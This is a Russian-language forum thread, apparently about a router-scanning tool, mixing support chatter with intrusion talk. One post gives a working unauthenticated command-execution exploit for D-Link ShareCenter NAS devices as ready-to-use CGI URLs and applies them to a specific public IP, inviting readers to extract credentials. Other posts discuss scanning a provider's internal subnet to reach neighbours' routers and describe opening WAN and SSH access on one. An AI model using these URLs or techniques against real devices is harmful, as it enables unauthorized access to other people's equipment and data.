Слишком много насканировали, память испортилась. Пока программа не зависла, скопируйте через Ctrl+C таблицу в какой-нибудь текстовый файл.
Древний оффтоп. (вспомнил) Прошу прощения что в этой ветке(не знаю куда положить). Пусть тут и остаётся. https://yadi.sk/i/LCLoq3ZS3Le8aF https://yadi.sk/i/joBbWfYs3Le8cH Второе лето эксплуатации заканчивается, было всякое: грозы/морозы/жаруны/грады. Без единого сбоя(один раз только шину питания оборвало ветром в месте скрутки). Отличные электролиты, хорошая сборка готовая для outdoor. Знаю, выглядит несерьёзно, но всё делалось по принципу: "Я тебя слепила из того что было, а потом что было..." (c)
Если у меня ip показывает другой город это значит у меня серый ip? Если да то как просканировать внутреннею подсеть и есть ли шанс что соседние точки попадут в эту подсеть или они никак не связаны?
Нет, это означает, что у вас крупный интернет провайдер, и город определяется тот, в котором этот провайдер преобладает больше всего. Серый ли у вас IP - смотрите в настройках (статусе) WAN вашего роутера. Если всё правильно настроите, то шансы есть.
Из документации я понял что это серый ip, но какова вероятность что один из соседних роутеров будет в моей подсети и как вообще определить эту подсеть?
старенький, но все еще иногда актуальный эксплойт на D-Link ShareCenter DNS-320, версия прошивки 2.02.0923.2011 DNS-325, версия прошивки 1.01.1217.2010 Spoiler: expliot D-Link ShareCenter devices suffer from a publicly-known authentication bypass issue. In this advisory we shed some light over the impact of this issue. In particular, the device implements almost no authentication checks on HTTP requests for any existing CGI script (i.e., all the CGIs under the /cgi directory). As an example, an attacker may retrieve the device model & firmware version by accessing the following resources: http:/IP/cgi-bin/discovery.cgi http:/IP/cgi-bin/system_mgr.cgi?cmd=get_firm_v_xml Besides information gathering, this vulnerability can be exploited to gain full control of the device. In particular, an undocumented functionality permits to execute arbitrary commands, displaying their output in the generated HTML page. As an example, to execute the "ls" command, an attacker can access the following URL: http:/IP/cgi-bin/system_mgr.cgi?cmd=cgi_sms_test&command1=ls Even in this case, no authentication checks are performed. пример Spoiler: example 181.121.64.212/cgi-bin/discovery.cgi 181.121.64.212/cgi-bin/system_mgr.cgi?cmd=get_firm_v_xml 181.121.64.212/cgi-bin/system_mgr.cgi?cmd=cgi_sms_test&command1=ls можно добраться и до логина с паролем. кому интересно - может поиграться и покрутить дальше. п.с. для тех, кому интересны более свежие уязвимости шары, но более сложнее эксплуатируемые (через самба): http://b.fl7.de/2016/08/d-link-nas-dns-xss-via-smb.html
Поддерживаю. А то не всегда удобно проверять на ходу где сейчас сканер. (приходится в ranges.txt лазить, а это не наглядно)
Не думаю, что стандартный компонент позволит так сделать. https://stackoverflow.com/questions/5091018/enable-scroll-bars-in-disabled-tmemo-control Но вот не блокировать его в принципе можно, учитывая что кнопки всё равно заблокированы.
Такой вопрос - есть ip роутера внутренней сети провайдера (10....), nmap нормально сканирует его wan, говорит, что порт 80 открыт, операционная система правильно определяется (т.е. роутер именно этот). При этом невозможно зайти через браузер на страницу ввода пароля админки - какие могут быть варианты? Т.е. это работа фаервола самого роутера, или провайдера, или факт наличия страницы админки на 80 порту lan не означает её наличие на wan? Есть устройства в этой подсети, которые без проблем дают зайти на страницу ввода пароля.
Спасибо, попробую. ps разобрался, нужно просто было в роутере (есть доступ по wlan) включить доступ к wan, заодно ssh включил , красота. Жаль, что сам на другом провайдере, т.е. нет доступа к внутренней городской сети, зашёл через глобальную, но видимо до первой перезагрузки роутера.. ps2 вах, там DDNS халявный от производителя роутера, просто класс .
Что-то мне понадобился ресторатор. Качать было лень, думаю дай посмотрю в Тотал Командоре. Он на скрине. И увидел не только его, но и Ротер скан. Охренел от увиденного Так держать парни, вы уже вошли в классику!